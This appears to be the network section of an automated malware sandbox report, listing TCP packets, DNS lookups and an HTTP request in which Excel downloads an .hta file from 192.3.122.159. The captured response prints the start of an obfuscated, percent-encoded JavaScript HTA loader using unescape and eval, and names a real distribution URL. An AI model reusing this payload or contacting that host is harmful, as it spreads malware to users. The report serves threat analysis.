            Dec 16, 2024 10:07:01.481908083 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.481969118 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.481987953 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.482047081 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.489275932 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.489294052 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.489355087 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.489375114 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.489453077 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.627808094 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.627876997 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.627902985 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.627928019 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.627963066 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.627994061 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.634123087 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.634172916 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.634195089 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.634213924 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.634234905 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.634254932 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.641695023 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.641715050 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.641778946 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.641801119 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.641829967 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.641843081 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.648938894 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.648984909 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.649023056 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.649040937 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.649068117 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.649087906 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.655565977 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.655610085 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.655638933 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.655657053 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.655679941 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.655700922 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.663958073 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.664005041 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.664028883 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.664047956 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.664072037 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.664092064 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.670720100 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.670763016 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.670789957 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.670804977 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.670828104 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.670845032 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.678611994 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.678657055 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.678705931 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.678723097 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.678735971 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.678757906 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.819375038 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.819448948 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.819468975 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.819498062 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.819523096 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.819684029 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.825818062 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.825869083 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.825901985 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.825926065 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.825941086 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.825961113 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.833688021 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.833741903 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.833762884 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.833782911 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.833796978 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.833815098 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.840450048 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.840497971 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.840522051 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.840539932 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.840553999 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.840569019 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.848160028 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.848205090 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.848228931 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.848247051 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.848263025 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.848311901 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.855524063 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.855571032 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.855596066 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.855613947 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.855628967 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.855649948 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.863442898 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.863495111 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.863523006 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.863538980 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.863550901 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.863569021 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.870193005 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.870294094 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.870322943 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.870338917 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.870367050 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.870387077 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.010963917 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.010994911 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.011070013 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.011101007 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.011154890 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.016949892 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.016971111 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.017015934 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.017035007 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.017074108 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.024815083 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.024838924 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.024889946 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.024907112 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.024964094 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.032591105 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.032608986 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.032663107 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.032680035 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.032716036 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.040591002 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.040637016 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.040673971 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.040693998 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.040707111 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.040869951 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.047871113 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.047921896 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.047952890 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.047976971 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.047990084 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.048196077 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.054641962 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.054698944 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.054721117 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.054742098 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.054755926 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.054775953 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.062486887 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.062505007 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.062561989 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.062582016 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.062618017 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.202658892 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.202683926 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.202756882 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.202805042 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.202872992 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.209414005 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.209467888 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.209505081 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.209525108 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.209541082 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.209628105 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.217076063 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.217103958 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.217159033 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.217190027 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.217207909 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.217235088 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.224841118 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.224865913 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.224936962 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.224965096 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.225073099 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.231760025 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.231784105 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.231844902 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.231867075 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.231981993 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.239070892 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.239089966 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.239146948 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.239167929 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.239276886 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.246912003 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.246929884 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.246985912 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.247013092 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.247030020 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.247051001 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.254580021 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.254595995 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.254664898 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.254688978 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.254829884 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.394675970 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.394699097 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.394782066 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.394819021 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.394835949 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.395004988 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.401328087 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.401345968 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.401427984 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.401462078 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.401508093 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.409214020 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.409230947 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.409307957 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.409334898 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.409375906 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.416985989 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.417006016 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.417237997 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.417257071 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.417418003 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.423938990 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.423959017 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.423998117 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.424021006 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.424035072 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.424063921 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.432100058 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.432126045 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.432178020 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.432208061 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.432221889 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.432244062 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.439016104 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.439035892 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.439188004 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.439218044 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.439353943 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.446763039 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.446778059 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.446845055 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.446868896 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.446907043 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.586702108 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.586730957 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.586776972 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.586817980 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.586833000 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.586865902 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.594135046 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.594157934 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.594218969 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.594288111 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.594326973 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.594352007 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.600760937 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.600788116 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.600883007 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.600914955 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.602672100 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.608755112 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.608774900 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.608839035 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.608863115 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.608880997 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.608962059 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.616450071 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.616471052 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.616520882 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.616544962 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.616564989 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.616652012 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.623828888 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.623847961 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.623931885 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.623955011 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.623991966 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.631613970 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.631632090 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.631712914 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.631714106 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.631761074 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.634160042 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.634181023 CET4434974713.107.246.63192.168.2.25

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Dec 16, 2024 10:06:18.274678946 CET5948253192.168.2.251.1.1.1
            Dec 16, 2024 10:06:18.689383030 CET53594821.1.1.1192.168.2.25
            Dec 16, 2024 10:06:44.423249960 CET5948253192.168.2.251.1.1.1

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Dec 16, 2024 10:06:18.274678946 CET192.168.2.251.1.1.10x28acStandard query (0)curt.wiz.coA (IP address)IN (0x0001)false
            Dec 16, 2024 10:06:44.423249960 CET192.168.2.251.1.1.10x2057Standard query (0)assets.msn.comA (IP address)IN (0x0001)false

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Dec 16, 2024 10:06:18.689383030 CET1.1.1.1192.168.2.250x28acNo error (0)curt.wiz.cocurt.wiz.co.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
            Dec 16, 2024 10:06:18.689383030 CET1.1.1.1192.168.2.250x28acNo error (0)curt.wiz.co.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
            Dec 16, 2024 10:06:18.689383030 CET1.1.1.1192.168.2.250x28acNo error (0)curt.wiz.co.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
            Dec 16, 2024 10:06:44.560652018 CET1.1.1.1192.168.2.250x2057No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false

            HTTP Request Dependency Graph

            • curt.wiz.co
            • otelrules.svc.static.microsoft
            • 192.3.122.159

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.2549730192.3.122.159802696C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            TimestampBytes transferredDirectionData
            Dec 16, 2024 10:06:21.469419956 CET276OUTGET /121/vfc/clearentirethingwithbestnoticetheeverythinggooodfrome.hta HTTP/1.1
            Accept: */*
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Connection: Keep-Alive
            Host: 192.3.122.159
            Dec 16, 2024 10:06:22.577073097 CET1236INHTTP/1.1 200 OK
            Date: Mon, 16 Dec 2024 09:06:22 GMT
            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
            Last-Modified: Sun, 15 Dec 2024 15:01:35 GMT
            ETag: "24127-62950571107a0"
            Accept-Ranges: bytes
            Content-Length: 147751
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: application/hta
            Data Raw: 3c 53 63 72 69 70 74 20 4c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 73 63 72 69 70 74 27 3e 0d 0a 3c 21 2d 2d 20 48 54 4d 4c 20 45 6e 63 72 79 70 74 69 6f 6e 20 70 72 6f 76 69 64 65 64 20 62 79 20 74 75 66 61 74 2e 63 6f 6d 20 2d 2d 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 25 36 38 25 37 34 25 36 44 25 36 43 25 33 45 25 30 41 25 33 43 25 36 38 25 36 35 25 36 31 25 36 34 25 33 45 25 30 41 25 33 43 25 32 46 25 36 38 25 36 35 25 36 31 25 36 34 25 33 45 25 30 41 25 33 43 25 36 32 25 36 46 25 36 34 25 37 39 25 33 45 25 30 41 25 30 41 25 33 43 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 30 25 37 34 25 37 39 25 37 30 25 36 35 25 33 44 25 32 32 25 37 34 25 36 35 25 37 38 25 37 34 25 32 46 25 36 41 25 36 31 25 37 36 25 36 31 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 32 25 33 45 25 30 41 25 33 43 25 32 31 25 32 44 25 32 44 25 32 30 25 30 41 25 36 35 25 37 36 25 36 31 25 36 43 25 32 38 25 37 35 25 36 45 25 36 [TRUNCATED]
            Data Ascii: <Script Language='Javascript'>... HTML Encryption provided by tufat.com -->...document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%20%0A%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%27%25%36%36%25%37%35%25%36%65%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%32%30%25%36%61%25%33%36%25%36%31%25%36%34%25%33%38%25%33%32%25%36%35%25%32%38%25%37%33%25%32%39%25%32%30%25%37%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%32%25%32%30%25%33%64%25%32%30%25%32%32%25%32%32%25%33%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%34%25%36%64%25%37%30%25%32%30%25%33%64%25%32%30%25%37%33%25%32%65%25%37%33%25%37%30%25%36%63%25%36%39%25%37%34%25%32%38%25%32%32%25%33%31%25%33%37%25%33%38%25%33%31%25%33%35%25%33%34%25%33%
            Dec 16, 2024 10:06:22.577109098 CET1236INData Raw: 33 36 25 32 35 25 33 33 25 33 30 25 32 35 25 33 32 25 33 32 25 32 35 25 33 32 25 33 39 25 32 35 25 33 33 25 36 32 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 33 39 25 32 35 25 33 37 25 33 33 25 32 35 25 33 32 25 33 30 25 32 35 25 33 33 25 36
            Data Ascii: 36%25%33%30%25%32%32%25%32%39%25%33%62%25%30%61%25%30%39%25%37%33%25%32%30%25%33%64%25%32%30%25%37%35%25%36%65%25%36%35%25%37%33%25%36%33%25%36%31%25%37%30%25%36%35%25%32%38%25%37%34%25%36%64%25%37%30%25%35%62%25%33%30%25%35%64%25%32%39%25%33%
            Dec 16, 2024 10:06:22.577127934 CET448INData Raw: 32 35 25 33 36 25 36 32 25 32 35 25 33 32 25 36 35 25 32 35 25 33 36 25 33 33 25 32 35 25 33 36 25 33 38 25 32 35 25 33 36 25 33 31 25 32 35 25 33 37 25 33 32 25 32 35 25 33 34 25 33 31 25 32 35 25 33 37 25 33 34 25 32 35 25 33 32 25 33 38 25 32
            Data Ascii: 25%36%62%25%32%65%25%36%33%25%36%38%25%36%31%25%37%32%25%34%31%25%37%34%25%32%38%25%36%39%25%32%35%25%36%62%25%32%65%25%36%63%25%36%35%25%36%65%25%36%37%25%37%34%25%36%38%25%32%39%25%32%39%25%35%65%25%37%33%25%32%65%25%36%33%25%36%38%25%36%31%
            Dec 16, 2024 10:06:22.577141047 CET1236INData Raw: 35 25 32 35 25 33 37 25 33 34 25 32 35 25 33 37 25 33 35 25 32 35 25 33 37 25 33 32 25 32 35 25 33 36 25 36 35 25 32 35 25 33 32 25 33 30 25 32 35 25 33 37 25 33 32 25 32 35 25 33 33 25 36 32 25 32 35 25 33 30 25 36 31 25 32 35 25 33 37 25 36 34
